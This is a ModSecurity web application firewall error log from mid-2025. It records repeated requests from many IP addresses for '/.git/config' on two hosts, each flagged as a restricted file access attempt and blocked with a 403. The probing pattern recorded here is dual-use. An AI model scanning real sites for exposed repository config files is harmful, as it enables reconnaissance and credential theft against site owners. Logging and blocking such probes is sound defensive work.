[Fri May 30 13:15:04.645590 2025] [:error] [pid 3513617] [client 45.148.10.80:54872] [client 45.148.10.80] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aDmTODMAKaqM3U_Do9qSRgAAAAU"]
[Mon Jun 02 05:40:15.112811 2025] [:error] [pid 3579980] [client 3.81.53.186:35108] [client 3.81.53.186] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aD0dH7Lbj7Nq2v8xITfgMAAAAAA"]
[Mon Jun 02 05:40:15.117114 2025] [:error] [pid 3579980] [client 3.81.53.186:35108] [client 3.81.53.186] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aD0dH7Lbj7Nq2v8xITfgMAAAAAA"]
[Mon Jun 02 05:40:15.117297 2025] [:error] [pid 3579980] [client 3.81.53.186:35108] [client 3.81.53.186] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aD0dH7Lbj7Nq2v8xITfgMAAAAAA"]
[Mon Jun 02 10:02:58.697268 2025] [:error] [pid 3579980] [client 198.55.98.210:49194] [client 198.55.98.210] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aD1asrLbj7Nq2v8xITfgQgAAAAA"]
[Mon Jun 02 10:02:58.697594 2025] [:error] [pid 3579980] [client 198.55.98.210:49194] [client 198.55.98.210] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aD1asrLbj7Nq2v8xITfgQgAAAAA"]
[Mon Jun 02 10:02:58.697811 2025] [:error] [pid 3579980] [client 198.55.98.210:49194] [client 198.55.98.210] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aD1asrLbj7Nq2v8xITfgQgAAAAA"]
[Mon Jun 02 16:20:50.759416 2025] [:error] [pid 3579982] [client 93.123.109.105:53940] [client 93.123.109.105] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aD2zQiJ3V4phBfpZmsrumgAAAAI"]
[Mon Jun 02 16:20:50.759708 2025] [:error] [pid 3579982] [client 93.123.109.105:53940] [client 93.123.109.105] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aD2zQiJ3V4phBfpZmsrumgAAAAI"]
[Mon Jun 02 16:20:50.759891 2025] [:error] [pid 3579982] [client 93.123.109.105:53940] [client 93.123.109.105] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aD2zQiJ3V4phBfpZmsrumgAAAAI"]
[Tue Jun 03 00:47:32.742811 2025] [:error] [pid 3597762] [client 185.177.72.201:8036] [client 185.177.72.201] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aD4qBNqrqXY-Nea3L4bWvwAAAAE"]
[Tue Jun 03 00:47:32.743087 2025] [:error] [pid 3597762] [client 185.177.72.201:8036] [client 185.177.72.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aD4qBNqrqXY-Nea3L4bWvwAAAAE"]
[Tue Jun 03 00:47:32.743250 2025] [:error] [pid 3597762] [client 185.177.72.201:8036] [client 185.177.72.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aD4qBNqrqXY-Nea3L4bWvwAAAAE"]
[Tue Jun 03 01:49:20.540278 2025] [:error] [pid 3598635] [client 93.123.109.105:50544] [client 93.123.109.105] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aD44gPYosQdnYhYPSCe_4AAAAAY"]
[Tue Jun 03 01:49:20.540606 2025] [:error] [pid 3598635] [client 93.123.109.105:50544] [client 93.123.109.105] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aD44gPYosQdnYhYPSCe_4AAAAAY"]
[Tue Jun 03 01:49:20.540767 2025] [:error] [pid 3598635] [client 93.123.109.105:50544] [client 93.123.109.105] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aD44gPYosQdnYhYPSCe_4AAAAAY"]
[Tue Jun 03 04:09:04.161556 2025] [:error] [pid 3601633] [client 185.177.72.204:41750] [client 185.177.72.204] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aD5ZQNSJJk80SS1H2OtP1wAAAAU"]
[Tue Jun 03 04:09:04.161909 2025] [:error] [pid 3601633] [client 185.177.72.204:41750] [client 185.177.72.204] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aD5ZQNSJJk80SS1H2OtP1wAAAAU"]
[Tue Jun 03 04:09:04.162081 2025] [:error] [pid 3601633] [client 185.177.72.204:41750] [client 185.177.72.204] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aD5ZQNSJJk80SS1H2OtP1wAAAAU"]
[Tue Jun 03 07:08:30.619425 2025] [:error] [pid 3601620] [client 185.177.72.210:64506] [client 185.177.72.210] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aD6DTvrO8TeXtHdh57EMVQAAAAI"]
[Tue Jun 03 07:08:30.619726 2025] [:error] [pid 3601620] [client 185.177.72.210:64506] [client 185.177.72.210] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aD6DTvrO8TeXtHdh57EMVQAAAAI"]
[Tue Jun 03 07:08:30.619909 2025] [:error] [pid 3601620] [client 185.177.72.210:64506] [client 185.177.72.210] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aD6DTvrO8TeXtHdh57EMVQAAAAI"]
[Tue Jun 03 11:15:46.298793 2025] [:error] [pid 3601634] [client 185.177.72.179:63354] [client 185.177.72.179] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aD69Qow0oKpcIfsd8J-KxgAAAAY"]
[Tue Jun 03 11:15:46.299115 2025] [:error] [pid 3601634] [client 185.177.72.179:63354] [client 185.177.72.179] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aD69Qow0oKpcIfsd8J-KxgAAAAY"]
[Tue Jun 03 11:15:46.299285 2025] [:error] [pid 3601634] [client 185.177.72.179:63354] [client 185.177.72.179] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aD69Qow0oKpcIfsd8J-KxgAAAAY"]
[Tue Jun 03 11:59:55.157667 2025] [:error] [pid 3601619] [client 93.123.109.105:35824] [client 93.123.109.105] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aD7Hm1-4yAQilaliCUNfewAAAAE"]
[Tue Jun 03 11:59:55.157978 2025] [:error] [pid 3601619] [client 93.123.109.105:35824] [client 93.123.109.105] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aD7Hm1-4yAQilaliCUNfewAAAAE"]
[Tue Jun 03 11:59:55.158188 2025] [:error] [pid 3601619] [client 93.123.109.105:35824] [client 93.123.109.105] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aD7Hm1-4yAQilaliCUNfewAAAAE"]
[Tue Jun 03 14:15:19.528168 2025] [:error] [pid 3601622] [client 138.197.7.51:35620] [client 138.197.7.51] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aD7nV0RnnKih5_2e7xE4DAAAAAQ"]
[Tue Jun 03 14:15:19.529165 2025] [:error] [pid 3601622] [client 138.197.7.51:35620] [client 138.197.7.51] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aD7nV0RnnKih5_2e7xE4DAAAAAQ"]
[Tue Jun 03 14:15:19.529420 2025] [:error] [pid 3601622] [client 138.197.7.51:35620] [client 138.197.7.51] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aD7nV0RnnKih5_2e7xE4DAAAAAQ"]
[Thu Jun 05 13:08:34.570957 2025] [:error] [pid 3649406] [client 185.177.72.9:64150] [client 185.177.72.9] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aEF6snCrrhlKDtrdaXYiHQAAAAk"]
[Thu Jun 05 13:08:34.572266 2025] [:error] [pid 3649406] [client 185.177.72.9:64150] [client 185.177.72.9] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aEF6snCrrhlKDtrdaXYiHQAAAAk"]
[Thu Jun 05 13:08:34.572456 2025] [:error] [pid 3649406] [client 185.177.72.9:64150] [client 185.177.72.9] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aEF6snCrrhlKDtrdaXYiHQAAAAk"]
[Sat Jun 07 05:28:58.398453 2025] [:error] [pid 3689095] [client 54.173.130.153:45748] [client 54.173.130.153] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aEOx-rLebO-bvIObZqAroAAAAAY"]
[Sat Jun 07 05:28:58.399707 2025] [:error] [pid 3689095] [client 54.173.130.153:45748] [client 54.173.130.153] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aEOx-rLebO-bvIObZqAroAAAAAY"]
[Sat Jun 07 05:28:58.399890 2025] [:error] [pid 3689095] [client 54.173.130.153:45748] [client 54.173.130.153] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aEOx-rLebO-bvIObZqAroAAAAAY"]
[Sat Jun 07 07:14:59.042688 2025] [:error] [pid 3688256] [client 93.123.109.7:57224] [client 93.123.109.7] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aEPK0_VxgzOn_jj83LlVMgAAAAU"]
[Sat Jun 07 07:14:59.043017 2025] [:error] [pid 3688256] [client 93.123.109.7:57224] [client 93.123.109.7] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aEPK0_VxgzOn_jj83LlVMgAAAAU"]
[Sat Jun 07 07:14:59.043212 2025] [:error] [pid 3688256] [client 93.123.109.7:57224] [client 93.123.109.7] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aEPK0_VxgzOn_jj83LlVMgAAAAU"]
